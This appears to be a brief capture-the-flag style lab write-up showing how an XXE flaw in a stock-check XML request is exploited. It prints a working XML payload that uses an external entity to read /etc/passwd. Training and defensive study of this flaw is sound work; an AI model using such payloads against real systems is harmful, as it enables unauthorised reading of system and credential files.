While clicking the Check Stock button and intercepting the request, we observed that the POST request was sent in XML format.
We injected a simple payload to exploit XXE and successfully read the internal file /etc/passwd, which allowed us to solve the lab.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
